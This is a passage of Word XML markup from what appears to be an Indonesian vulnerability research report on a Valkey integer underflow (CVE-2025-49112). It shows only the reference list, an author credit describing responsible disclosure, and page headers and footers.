        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[7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]  MITRE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 Corporation. (2024).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CWE-191: Integer Underflow (Wrap or Wraparound). </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Weakness Enumeration. </w:t>
      </w:r>
      <w:hyperlink r:id="R8a92422601b04358">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://cwe.mitre.org/data/definitions/191.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="356113A1" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[8]  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OpenSSF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. (2024).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Guide to Coordinated Vulnerability Disclosure. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenSSF</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Best Practices. </w:t>
      </w:r>
      <w:hyperlink r:id="Rb9212d8cda79436e">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://openssf.org/blog/2023/06/22/guide-to-coordinated-vulnerability-disclosure/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="305B0D65" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[9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]  Seacord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, R.C. (2013).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Secure Coding in C and C++ (2nd Edition): Chapter 5 - Integer Security. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Addison-Wesley</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Professional. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="776D64C7" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[10]  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Andriesse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, D. (2019).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Practical Binary Analysis: Build Your Own Linux Tools for Binary Instrumentation, Analysis, and Disassembly. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">No Starch Press. </w:t>
      </w:r>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="49063554" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[11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]  LLVM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 Project. (2024).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>UndefinedBehaviorSanitizer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: Detection of Integer Overflow and Underflow. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LLVM Documentation. </w:t>
      </w:r>
      <w:hyperlink r:id="Rd00442cb10f94947">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://clang.llvm.org/docs/UndefinedBehaviorSanitizer.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="6F13E061" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[12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]  GCC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 Documentation. (2024).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>-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>fsanitize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=undefined: Ubiquitous Undefined Behavior Sanitizer. </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GNU Compiler Collection. </w:t>
      </w:r>
      <w:hyperlink r:id="Rcdc79ce06afc44d6">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://gcc.gnu.org/onlinedocs/gcc/Instrumentation-Options.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7567AE7F" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="160" w:line="340" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pP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[13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>]  ISO</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="1C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/IEC JTC1/SC22/WG14. (2023).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N3096: Checked Arithmetic for C - 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>stdckdint.h</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="1C1C1C"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (C23 Draft). </w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">C Standards Committee. </w:t>
      </w:r>
      <w:hyperlink r:id="Rda90cae91d2e4c3f">
        <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
          <w:rPr>
            <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
            <w:color w:val="2E75B6"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.open-std.org/jtc1/sc22/wg14/www/docs/n3096.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1A965116" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="7DF4E37C" wp14:textId="77777777">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="D8DDE6" w:sz="2" w:space="1"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="44FB30F8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2971F91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0A1628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37EADB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ADVISORY CREDITS DAN PENGAKUAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="1DA6542E" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="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EEA54D5" w14:paraId="643F64AC" wp14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A3A5C" w:sz="10"/>
              <w:left w:val="single" w:color="1A3A5C" w:sz="10"/>
              <w:bottom w:val="single" w:color="1A3A5C" w:sz="4"/>
              <w:right w:val="single" w:color="D8DDE6" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F6F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3F0702DD" wp14:textId="77777777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0A1628"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">@odaysec</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50F6A681" wp14:textId="77777777">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pP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5A6070"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Independent Security 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5A6070"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Researcher  |</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
                <w:color w:val="5A6070"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">  Vulnerability Discovery and Analysis</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04E3ABE4" wp14:textId="7D7A2D7A">
            <w:pPr>
              <w:spacing w:after="140" w:line="340" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pP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Menemukan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dan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menganalisis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CVE-2025-49112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analisis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biner pada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Mengikuti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prinsip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responsible disclosure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dengan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melaporkan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temuan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secara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privat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kepada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tim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Valkey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sebelum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pengungkapan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publik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.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Berkontribusi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pada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keamanan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proyek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open-source global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melalui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riset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kerentanan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yang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bertanggung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jawab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 xml:space="preserve"> dan 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terstandar</w:t>
            </w:r>
            <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
              <w:rPr>
                <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                <w:color w:val="1C1C1C"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECC1D41" wp14:textId="77777777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1A3A5C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">GitHub: </w:t>
            </w:r>
            <w:hyperlink w:history="1" r:id="rIdfscfuecvcb0m33-n_uvtf">
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                  <w:color w:val="2E75B6"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/odaysec</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="52FE11AC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A3A5C"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Advisory: </w:t>
            </w:r>
            <w:hyperlink w:history="1" r:id="rIdmihmox-kdqxvujbhzljsn">
              <w:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria"/>
                  <w:color w:val="2E75B6"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t xml:space="preserve">https://github.com/advisories/GHSA-xhp4-6g9v-4xvj</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="3041E394" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:before="0" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordml" w14:paraId="19391664" wp14:textId="77777777">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pP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 xml:space="preserve">Akhir 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>Dokumen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 xml:space="preserve">  |  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>Jurnal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 xml:space="preserve"> Riset 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>Keamanan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 xml:space="preserve"> Siber Vol. 1 No. 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>3  |</w:t>
      </w:r>
      <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="5A6070"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  CVE-2025-49112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4EEA54D5" w14:paraId="480093E4" wp14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:color="D0DCF0" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:before="80"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL: For Educational and Research Purposes </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Only  |</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>odaysec</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  2025</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">Halaman </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">PAGE</w:instrText>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> d</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">ari </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve">NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070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4EEA54D5" w14:paraId="66389511" wp14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:color="1A3A5C" w:sz="6" w:space="1"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Jurnal</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> Riset </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Keamanan</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Siber  |</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:i w:val="1"/>
        <w:iCs w:val="1"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  Vulnerability Research Report</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>CVE-2025-</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>49112  |</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Valkey</w:t>
    </w:r>
    <w:r w:rsidRPr="4EEA54D5" w:rsidR="4EEA54D5">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="5A6070"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> Integer Underflow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860e12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9540a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▸"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="48e17b24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192E34C"/>
  <w15:docId w15:val="{494080D2-3F2E-4604-820C-2F688204828B}"/>
  <w:rsids>
    <w:rsidRoot w:val="29B3F757"/>
    <w:rsid w:val="29B3F757"/>
    <w:rsid w:val="2F8DE94D"/>
    <w:rsid w:val="4EEA54D5"/>
    <w:rsid w:val="55B7800B"/>
    <w:rsid w:val="55B7800B"/>
    <w:rsid w:val="575B873A"/>
    <w:rsid w:val="686C9B9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mbria" w:hAnsi="Cambria" w:eastAsia="Cambria" w:cs="Cambria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40" w:after="200"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0A1628"/>
      <w:sz w:val="40"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 20"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="160"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
